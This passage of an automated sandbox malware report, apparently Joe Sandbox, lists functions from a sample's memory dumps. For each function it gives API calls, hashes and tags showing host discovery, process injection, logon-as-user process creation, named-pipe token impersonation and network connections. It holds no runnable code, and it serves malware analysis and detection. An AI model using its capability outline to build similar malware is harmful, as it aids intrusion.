                • Opcode Fuzzy Hash: d703984814e996e83ed98980a5e84da43d7f727c49fba6facbc0338df0550374
                • Instruction Fuzzy Hash: BD11EB76600B8455F705EFEDEC5031D7A92A780761F1D59E5CA19CF3D0CAF8C4428715
                Function 03483A53 Relevance: 11.6, APIs: 9, Instructions: 305COMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 03483AF0
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • malloc.LIBCMT ref: 03483AFA
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C6A3
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C6A8
                • malloc.LIBCMT ref: 03483B05
                • free.LIBCMT ref: 03483CC5
                • free.LIBCMT ref: 03483CCD
                • free.LIBCMT ref: 03483CD5
                  • Part of subcall function 03484937: malloc.LIBCMT ref: 03484981
                  • Part of subcall function 03484937: malloc.LIBCMT ref: 0348498C
                  • Part of subcall function 03484937: free.LIBCMT ref: 03484A73
                  • Part of subcall function 03484937: free.LIBCMT ref: 03484A7B
                • free.LIBCMT ref: 03483CE1
                • free.LIBCMT ref: 03483CEE
                • free.LIBCMT ref: 03483CFB
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$malloc$_errno$_callnewh
                • String ID:
                • API String ID: 4160633307-0
                • Opcode ID: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
                • Instruction ID: f78647d4f074043de9276dbc9df5725663fd5a01215ffe67b5c17f12d480cfd0
                • Opcode Fuzzy Hash: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
                • Instruction Fuzzy Hash: E181B239318B094FDB29FF2D949167E77D5FB85A04F44025FD48ACB352EE20D803868A
                Function 0388460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 038846A9
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • malloc.LIBCMT ref: 038846B3
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D25C
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D261
                • malloc.LIBCMT ref: 038846BE
                • free.LIBCMT ref: 0388487E
                • free.LIBCMT ref: 03884886
                • free.LIBCMT ref: 0388488E
                  • Part of subcall function 038854F0: malloc.LIBCMT ref: 0388553A
                  • Part of subcall function 038854F0: malloc.LIBCMT ref: 03885545
                  • Part of subcall function 038854F0: free.LIBCMT ref: 0388562C
                  • Part of subcall function 038854F0: free.LIBCMT ref: 03885634
                • free.LIBCMT ref: 0388489A
                • free.LIBCMT ref: 038848A7
                • free.LIBCMT ref: 038848B4
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$malloc$_errno$_callnewh$AllocHeap
                • String ID:
                • API String ID: 3534990644-0
                • Opcode ID: 6be82fb75818ba1ee7756e05d45c61c62cba93ed433390d031e696745eb28498
                • Instruction ID: 3c59542ea3fd0ee4e2317996c62ea49a548f3482db47e40d88885f520293e357
                • Opcode Fuzzy Hash: 6be82fb75818ba1ee7756e05d45c61c62cba93ed433390d031e696745eb28498
                • Instruction Fuzzy Hash: E66125277007C686DF20EBAB944076EB755F785BC8F484596CD469BB04DF38C50AC704
                Function 03899A44 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                • malloc.LIBCMT ref: 03899AF0
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                  • Part of subcall function 0389CA38: malloc.LIBCMT ref: 0389CA88
                • GetComputerNameExA.KERNEL32 ref: 03899BB2
                • GetComputerNameA.KERNEL32 ref: 03899BE7
                • GetUserNameA.ADVAPI32 ref: 03899C1C
                  • Part of subcall function 0388EC4C: WSASocketA.WS2_32 ref: 0388EC7A
                • malloc.LIBCMT ref: 03899D35
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                • String ID: VUUU
                • API String ID: 632458648-2040033107
                • Opcode ID: fbc643f024c366e196c72bb08a222e984ec50c02734afe1649aac117ff65b8a6
                • Instruction ID: cc3907236dd3e960fb7773dad34d8ebe05d81deb81132c988c3b9dc00ae9b7c6
                • Opcode Fuzzy Hash: fbc643f024c366e196c72bb08a222e984ec50c02734afe1649aac117ff65b8a6
                • Instruction Fuzzy Hash: E391162AB0079046FF15EBAAD8503AD67A5F785B84F8880ABDD49DB794DF3CC9468301
                Function 03890770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                • GetStartupInfoA.KERNEL32 ref: 03890838
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAAD
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAD5
                • GetCurrentDirectoryW.KERNEL32 ref: 038908C5
                • GetCurrentDirectoryW.KERNEL32 ref: 038908D4
                • CreateProcessWithLogonW.ADVAPI32 ref: 0389092F
                • GetLastError.KERNEL32 ref: 03890939
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                • String ID: %s as %s\%s: %d
                • API String ID: 3435635427-816037529
                • Opcode ID: 92d3955544a4728f5804b16fe6b589a6f18a28386c997154fca0a382d1a098e1
                • Instruction ID: bb65f062201474bf9a2acb80f89d1a1741ed178e2fa53f4fd89a996fcbd964ea
                • Opcode Fuzzy Hash: 92d3955544a4728f5804b16fe6b589a6f18a28386c997154fca0a382d1a098e1
                • Instruction Fuzzy Hash: B9518A76704B8186EB60DF5AF84074BB7A9F789B80F148166DF8997B28DF38C0068B40
                Function 03890344 Relevance: 10.6, APIs: 7, Instructions: 109injectionCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Process$Memory$ErrorLastRead$CurrentWritefreemalloc
                • String ID:
                • API String ID: 2416742903-0
                • Opcode ID: d39206b21eda18042a21def0aae61064133e79866cd27e778fe3c13849b8ffb1
                • Instruction ID: 6a02c43536547dd8f7c5e8d4e58138dcdb118a72bb72a042f3ee0b2776571d99
                • Opcode Fuzzy Hash: d39206b21eda18042a21def0aae61064133e79866cd27e778fe3c13849b8ffb1
                • Instruction Fuzzy Hash: C24181A6314B41C6EB64DBA6E84076FA364FB88B88F045466AE89C7B48EF38C1458701
                Function 0349D197 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 0349D1BD
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _invalid_parameter_noinfo.LIBCMT ref: 0349D1C9
                • __crtIsPackagedApp.LIBCMT ref: 0349D1DA
                • _dosmaperr.LIBCMT ref: 0349D224
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 2917016420-0
                • Opcode ID: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
                • Instruction ID: 5a4577d8e86c04d97c34b6a4ebf2272be4dae9f5048812b4b24663ea56c6ed63
                • Opcode Fuzzy Hash: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
                • Instruction Fuzzy Hash: B231E330A18B094FFF48EF6D98453297BD1FB89325F04465FA44ACF2A0DB38C8418746
                Function 034A7A43 Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                • String ID:
                • API String ID: 4120058822-0
                • Opcode ID: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
                • Instruction ID: f39c8527d29e4d218389df21c9b7a7bc4e89360400e58c933c9bf9121f38124d
                • Opcode Fuzzy Hash: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
                • Instruction Fuzzy Hash: 6E212331B08F015EE734EFEDA89022E7E84EB94211F05016FD416CF2D1DAB559428799
                Function 0389C92C Relevance: 10.6, APIs: 7, Instructions: 75COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$OpenProcessToken
                • String ID:
                • API String ID: 2009710997-0
                • Opcode ID: c45598522d1ef4c26f254913e2d744c8b6dd039168d3660f363170ff2796bb64
                • Instruction ID: b3a5a501c1a979b8283c47259ab819632ede6fb51c944c5c5f68ee712b1fa77f
                • Opcode Fuzzy Hash: c45598522d1ef4c26f254913e2d744c8b6dd039168d3660f363170ff2796bb64
                • Instruction Fuzzy Hash: 3321F42530470183FF11EBB6E45471BA7A4ABC8B94F1840A9AE4AC7764DF3DC446C741
                Function 038ADA90 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 038ADAC4
                  • Part of subcall function 0389F454: _getptd.LIBCMT ref: 0389F46A
                  • Part of subcall function 0389F454: __updatetlocinfo.LIBCMT ref: 0389F49F
                  • Part of subcall function 0389F454: __updatetmbcinfo.LIBCMT ref: 0389F4C6
                • _errno.LIBCMT ref: 038ADADF
                • _invalid_parameter_noinfo.LIBCMT ref: 038ADAEA
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                • String ID:
                • API String ID: 3191669884-0
                • Opcode ID: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
                • Instruction ID: 510774168901aed38951da954a2c56cb0e4d369378b70188cf1147273afa68eb
                • Opcode Fuzzy Hash: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
                • Instruction Fuzzy Hash: 6A218D76304B848AEB10DF9DD49065AB6A5F744FE4F5881A6EF58CBF84CB74C946C700
                Function 038940BC Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTickioctlsocket
                • String ID:
                • API String ID: 3686034022-0
                • Opcode ID: df8b12fdec247861816a65c7895da2fd6f05e4dcf0f4f0871b067a3fd8febfec
                • Instruction ID: 880a8659819dc44a41fde9639aea1e94c3d5a380d75ca09b9e7a82b4da8fe682
                • Opcode Fuzzy Hash: df8b12fdec247861816a65c7895da2fd6f05e4dcf0f4f0871b067a3fd8febfec
                • Instruction Fuzzy Hash: F1110A7120074586FB21CBA7E84435AF324E784BA4F584161E959C3AA4CF78C98AC704
                Function 0388FDAC Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                • String ID:
                • API String ID: 4232080776-0
                • Opcode ID: 63d816b5d70ed7ced87649dbe768fda66f973ffc67f04252ce0421f3c604c356
                • Instruction ID: 84742bca4bb2262d7f8073f0cc8b032f4411b0c379aa6e18d2bf8d974f40363e
                • Opcode Fuzzy Hash: 63d816b5d70ed7ced87649dbe768fda66f973ffc67f04252ce0421f3c604c356
                • Instruction Fuzzy Hash: 0A11E761324749C2FB62EB61F84476AB328FB80B85F888591A6CA86565CF3CC208D720
                Function 0389EA50 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                • String ID:
                • API String ID: 2328795619-0
                • Opcode ID: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
                • Instruction ID: dd123e336e8a38fff5a11d9b17a833218acf4e294c6530a98f24d162c3d08ae0
                • Opcode Fuzzy Hash: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
                • Instruction Fuzzy Hash: EC51487171575082BF18CAEA990066ABE90B794BF8F1C47579E79C7BD4CB34E091C740
                Function 038A8208 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _mtinitlocknum.LIBCMT ref: 038A8235
                  • Part of subcall function 038A1D0C: _FF_MSGBANNER.LIBCMT ref: 038A1D29
                  • Part of subcall function 038A1D0C: _NMSG_WRITE.LIBCMT ref: 038A1D33
                • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 038A82B8
                • EnterCriticalSection.KERNEL32 ref: 038A82D4
                • LeaveCriticalSection.KERNEL32 ref: 038A82E4
                • _calloc_crt.LIBCMT ref: 038A835A
                • __lock_fhandle.LIBCMT ref: 038A83C2
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                • String ID:
                • API String ID: 445582508-0
                • Opcode ID: cb94c47234e7318eaf63806fd4c7d2241f139b70922057cc91e94235dbb42d3c
                • Instruction ID: efe1f26d992252dbba9eec0a0b23fcdfd192efc33da0095dd9fae612cf151f22
                • Opcode Fuzzy Hash: cb94c47234e7318eaf63806fd4c7d2241f139b70922057cc91e94235dbb42d3c
                • Instruction Fuzzy Hash: AF512672610F8482EB10DF68D44432EBBA9FB84B58F499599DE4E877A0DF78C952C720
                Function 0389098C Relevance: 9.1, APIs: 6, Instructions: 126COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                  • Part of subcall function 0389E560: _errno.LIBCMT ref: 0389E4B7
                  • Part of subcall function 0389E560: _invalid_parameter_noinfo.LIBCMT ref: 0389E4C2
                • fseek.LIBCMT ref: 03890A28
                  • Part of subcall function 0389EDE4: _errno.LIBCMT ref: 0389EE0C
                  • Part of subcall function 0389EDE4: _invalid_parameter_noinfo.LIBCMT ref: 0389EE17
                • _ftelli64.LIBCMT ref: 03890A30
                  • Part of subcall function 0389EE58: _errno.LIBCMT ref: 0389EE76
                  • Part of subcall function 0389EE58: _invalid_parameter_noinfo.LIBCMT ref: 0389EE81
                • fseek.LIBCMT ref: 03890A40
                  • Part of subcall function 0389EDE4: _fseek_nolock.LIBCMT ref: 0389EE35
                • GetFullPathNameA.KERNEL32 ref: 03890A63
                • malloc.LIBCMT ref: 03890A80
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                  • Part of subcall function 0388CFCC: malloc.LIBCMT ref: 0388CFDF
                  • Part of subcall function 0388CFFC: htonl.WS2_32 ref: 0388D007
                • fclose.LIBCMT ref: 03890B3D
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                • String ID:
                • API String ID: 3587854850-0
                • Opcode ID: a569d82a0c52b606fced7d3ca32dedd0a036ca5e6a97fc9ef12d49b38375e880
                • Instruction ID: ee5e461f1e3281a2a90069f7bcc343bc8ca0234ba8b3a017565d5c75b16919da
                • Opcode Fuzzy Hash: a569d82a0c52b606fced7d3ca32dedd0a036ca5e6a97fc9ef12d49b38375e880
                • Instruction Fuzzy Hash: 0041E42631479082EF10EB9AE45432EA755F7C8BD4F8881A6DE5E9BB98DF3CC506C701
                Function 038943B0 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetACP.KERNEL32 ref: 038943C8
                • GetOEMCP.KERNEL32 ref: 038943D2
                • GetCurrentProcessId.KERNEL32 ref: 038943F8
                • GetTickCount.KERNEL32 ref: 03894400
                  • Part of subcall function 0389E38C: _getptd.LIBCMT ref: 0389E394
                • GetCurrentProcess.KERNEL32 ref: 0389443C
                  • Part of subcall function 0388FF70: GetModuleHandleA.KERNEL32 ref: 0388FF85
                  • Part of subcall function 0388FF70: GetProcAddress.KERNEL32 ref: 0388FF95
                • GetCurrentProcessId.KERNEL32 ref: 038944AE
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                • String ID:
                • API String ID: 3426420785-0
                • Opcode ID: b6fc155a55da666bb393d8027138b05ac493bc84460806fdbb4add4f73d2445a
                • Instruction ID: 766ff62151448f1cd38b0f41b4fbefdba1be94509fb16b796ede3b154f40991a
                • Opcode Fuzzy Hash: b6fc155a55da666bb393d8027138b05ac493bc84460806fdbb4add4f73d2445a
                • Instruction Fuzzy Hash: 4441D466710711A6FF01FBFAD85079D63A4BF88794F444496DE09DBAA8EF38C20AC701
                Function 0388E724 Relevance: 9.1, APIs: 6, Instructions: 108networkCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 0389C09C: RevertToSelf.ADVAPI32 ref: 0389C0AA
                • InternetOpenA.WININET ref: 0388E7E1
                • InternetSetOptionA.WININET ref: 0388E801
                • InternetSetOptionA.WININET ref: 0388E819
                • InternetConnectA.WININET ref: 0388E84F
                • InternetSetOptionA.WININET ref: 0388E88C
                • InternetSetOptionA.WININET ref: 0388E8B7
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Internet$Option$ConnectOpenRevertSelf
                • String ID:
                • API String ID: 1513466045-0
                • Opcode ID: dad49d787d011debb01431b698db0f5525ed4c0c9550348a44d35d6a50f0dafd
                • Instruction ID: 6d3d17f3457ece2732f47aa7d506daf9ac671e9decd8f85f7acdaefe4146589c
                • Opcode Fuzzy Hash: dad49d787d011debb01431b698db0f5525ed4c0c9550348a44d35d6a50f0dafd
                • Instruction Fuzzy Hash: 7F41137571078182EF24EF95E480B69B7A5F788B84F0890AADA499BF64EF3CD601C700
                Function 038955B4 Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 038955E6
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
